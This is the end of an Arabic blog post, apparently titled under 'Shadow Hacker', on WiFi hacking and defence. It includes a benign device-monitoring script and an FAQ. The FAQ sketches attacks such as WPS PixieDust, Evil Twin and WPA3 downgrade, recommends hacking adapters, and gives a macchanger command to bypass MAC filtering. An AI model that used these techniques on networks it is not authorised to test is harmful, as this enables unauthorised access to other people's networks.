ادخل إعدادات الراوتر بشكل دوري وشوف قائمة الأجهزة المتصلة. إذا في جهاز ما بتعرفه — غيّر كلمة سر WiFi فوراً.
# سكربت لمراقبة الأجهزة المتصلة بشبكتك
# بيفحص كل 30 ثانية وبينبهك لو في جهاز جديد
#!/usr/bin/env python3
"""WiFi Device Monitor - كاشف الأجهزة الغريبة"""
import subprocess
import time
import json
from datetime import datetime
KNOWN_DEVICES = {
"AA:BB:CC:DD:EE:01": "هاتفي iPhone",
"AA:BB:CC:DD:EE:02": "لابتوب الشغل",
"AA:BB:CC:DD:EE:03": "التلفزيون الذكي",
# أضف أجهزتك المعروفة هنا
}
def scan_network():
"""مسح الشبكة بـ arp-scan"""
result = subprocess.run(
["sudo", "arp-scan", "--localnet", "-q"],
capture_output=True, text=True
)
devices = []
for line in result.stdout.strip().split("\n"):
parts = line.split("\t")
if len(parts) >= 2:
ip, mac = parts[0], parts[1].upper()
devices.append({"ip": ip, "mac": mac})
return devices
def monitor(interval=30):
print(f"[*] WiFi Monitor Started - checking every {interval}s")
print(f"[*] Known devices: {len(KNOWN_DEVICES)}")
while True:
devices = scan_network()
for dev in devices:
if dev["mac"] not in KNOWN_DEVICES:
print(f"\n[!!!] UNKNOWN DEVICE DETECTED!")
print(f" IP: {dev['ip']}")
print(f" MAC: {dev['mac']}")
print(f" Time: {datetime.now()}")
print(f" ACTION: Check your router immediately!")
time.sleep(interval)
if __name__ == "__main__":
monitor()
أسئلة شائعة
سؤال: كم بياخد وقت اختراق شبكة WiFi؟
بيعتمد على الطريقة وكلمة السر. WPS PixieDust: 5-30 ثانية. WPS PIN Brute Force: 2-10 ساعات. Handshake + كلمة سر ضعيفة: دقائق لساعات. Handshake + كلمة سر قوية: أيام لسنوات (أو مستحيل). Evil Twin: بيعتمد على الضحية — دقائق لو فتح الصفحة وكتب كلمة السر.
سؤال: هل بقدر أخترق WiFi من الهاتف بدون Root؟
الخيارات محدودة جداً بدون Root. ما بتقدر تفعّل Monitor Mode أو تبعت deauth. بس بتقدر تفحص ثغرات الراوتر لو كنت متصل بالشبكة (كلمات سر افتراضية، ثغرات معروفة). للهجمات الحقيقية بتحتاج Root + Kali NetHunter + كرت WiFi خارجي.
سؤال: هل WPA3 مستحيل يتخترق؟
لا مش مستحيل بس أصعب بكتير من WPA2. الطرق الشغالة على WPA3: Downgrade Attack (لو Transition Mode مفعّل)، Evil Twin (خداع المستخدم)، ثغرات الراوتر نفسه، Dragonblood side-channel attacks (على بعض الراوترات). WPA3-Only مع كلمة سر قوية = حماية ممتازة.
سؤال: شو أفضل كرت WiFi للاختراق بسنة 2026؟
ALFA AWUS036ACHM هو الأفضل حالياً — بيدعم 2.4GHz و 5GHz، Monitor Mode، Packet Injection، وإشارة قوية جداً. إذا بدك خيار أرخص: TP-Link TL-WN722N v1 (بس Version 1 فقط!).
سؤال: كيف أعرف نوع تشفير شبكة WiFi؟
على Windows: اضغط على أيقونة WiFi → Properties → Security type. على Android: Settings → WiFi → اضغط على الشبكة المتصل فيها. على Linux: nmcli dev wifi أو sudo airodump-ng wlan0mon — عمود ENC بيعرض نوع التشفير.
سؤال: هل تطبيقات "WiFi Hacker" على Google Play حقيقية؟
لا! كلها كذب ونصب. أي تطبيق على Google Play بيقول "اخترق WiFi بضغطة زر" هو fake 100%. اختراق WiFi بيحتاج Monitor Mode وPacket Injection — وهاي ميزات ما بتتوفر بتطبيقات عادية. هالتطبيقات إما بتعرضلك إعلانات بس أو بتسرق بياناتك أو بتحمّل malware.
سؤال: هل فلترة MAC Address بتحمي الشبكة؟
لا أبداً! فلترة MAC هي "أمان وهمي". المهاجم بيقدر يشوف عناوين MAC لكل الأجهزة المتصلة بسهولة عبر airodump-ng وبيغيّر عنوان MAC تبعه ليصير مطابق لجهاز مصرّح — وهاد اسمه MAC Spoofing وبياخد ثانيتين: sudo macchanger -m TARGET_MAC wlan0
الخلاصة — الحقيقة الكاملة عن أمن WiFi
بالنهاية، لو بدنا نحكيها بصراحة... أغلب شبكات WiFi بالعالم العربي ضعيفة أمنياً. السبب: كلمات سر ضعيفة (أرقام تلفونات وأسماء)، WPS مفعّل، راوترات قديمة ما بيتم تحديثها، وكلمات سر إدارة افتراضية. أي شخص عنده كرت WiFi USB ونظام Kali Linux بيقدر يخترق أكتر من نص الشبكات حواليه.
بس الحماية ممكنة ومش صعبة! لو طبّقت النصائح اللي حكينا عنها — WPA3-Only، كلمة سر قوية 15+ حرف، WPS معطّل، firmware محدّث — شبكتك رح تكون من أقوى الشبكات وما حدا رح يقدر يخترقها بسهولة.
والأهم — استخدم VPN على شبكات WiFi العامة. هاي النصيحة الذهبية. حتى لو الشبكة مخترقة والمهاجم عم يعمل MITM — VPN بيحمي كل بياناتك.
شاركونا بالتعليقات إذا جربتوا أي طريقة من هاللي حكينا عنها وشو كانت النتيجة. وإذا بدكم مقال عن أي موضوع ثاني — حكولنا على قناتنا على Telegram. والسلام عليكم!
🔥 مواضيع ذات صلة من Shadow Hacker:
اختراق WiFi 2026، كيف تخترق شبكة واي فاي، اختراق WPA2 بدون wordlist، أدوات اختراق WiFi، Kali Linux WiFi hack، اختراق واي فاي WPA3، aircrack-ng شرح عربي، تهكير WiFi من الهاتف، اختراق الراوتر 2026، Evil Twin WiFi attack، WPS PIN hack، حماية شبكة WiFi، أفضل كرت WiFi للاختراق، hashcat WiFi crack، اختراق WiFi بدون كرت خارجي، PMKID attack شرح، Wifite شرح عربي، اختراق شبكات WiFi Termux
Shadow Hacker
مؤسس ومحرر المدونة | خبير أمن معلومات وتقنية
متخصص في الأمن السيبراني واختبار الاختراق وتحليل الثغرات. بشارك معكم كل جديد في عالم التقنية والأمن المعلوماتي بأسلوب عملي ومبسط.

